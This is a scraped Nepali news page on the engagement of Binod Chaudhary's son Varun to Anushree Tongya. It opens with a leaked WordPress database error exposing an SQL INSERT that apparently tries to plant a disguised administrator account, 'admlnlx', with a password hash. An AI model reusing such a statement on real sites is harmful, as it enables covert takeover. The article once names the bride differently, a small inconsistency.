WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BrOAMeOX/M41pJ.O84XNX.Q2gRxz8v/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 02:29:34', '', 'admlnlx', 'admlnlx')
काठमाडौं,पुस १-
डलर अर्वपति विनोद चौधरीका कान्छा छोरा वरुणको भारतीय व्यापारीकी छोरीसँग विहिवार इन्गेजमेन्ट भएको छ। भारतमा जेम्सको कारोवार गर्ने राजकुमार तोङ्ग्या तथा अनिता तोङ्ग्याकी छोरी अनुश्रीसँग वरुणको इन्गेजमेन्ट भएको हो।
चौधरीको निवासमा विहिवार सामान्य पारिवारिक कार्यक्रमसहित इन्गेजमेन्ट भए पनि वरुण र आज्ञाश्रीको विवाहको मिति भने तय भएको छैन्। स्रोतकाअनुसार यी दुईको सम्भवत मार्चपछि मात्रै विवाह हुनेछ।
गत फेब्रुअरीमा विनोदका पिता लुनकरण दासको निधन भएको थियो। यही कारण विवाह सम्भवत मार्चमा हुने चौधरी परिवार निकट स्रोतले जानकारी दियो।
विनोद चौधरीले खडा गरेको सिजी समूहको एम्पाएरमा वरुणले सिजी भित्र भारतीय बिजनेश युनिट हेर्छन्। निर्वाण नेपालमा केन्द्रित छन भने राहुलले चौधरी समूहका होटलको सञ्चालन र व्यवस्थापनसहित चौधरी समूहले तेस्रो देशमा फैलाएको एम्पाएर हेर्छन्।
भारत राजास्थानका तोङ्ग्या परिवारले जेम्स र ज्वेलरीमा पुस्तौंदेखि कारोवार गर्दै आएको छ। अनुश्रीका पिता राजकुमार प्रिसियस ज्वेल कर्पोरेशन मार्फत कारोवारमा छन् भने छोरी अनुश्री पारिवारिक व्यापारमध्येकै एक डाया कलरमा आवद्ध छन्।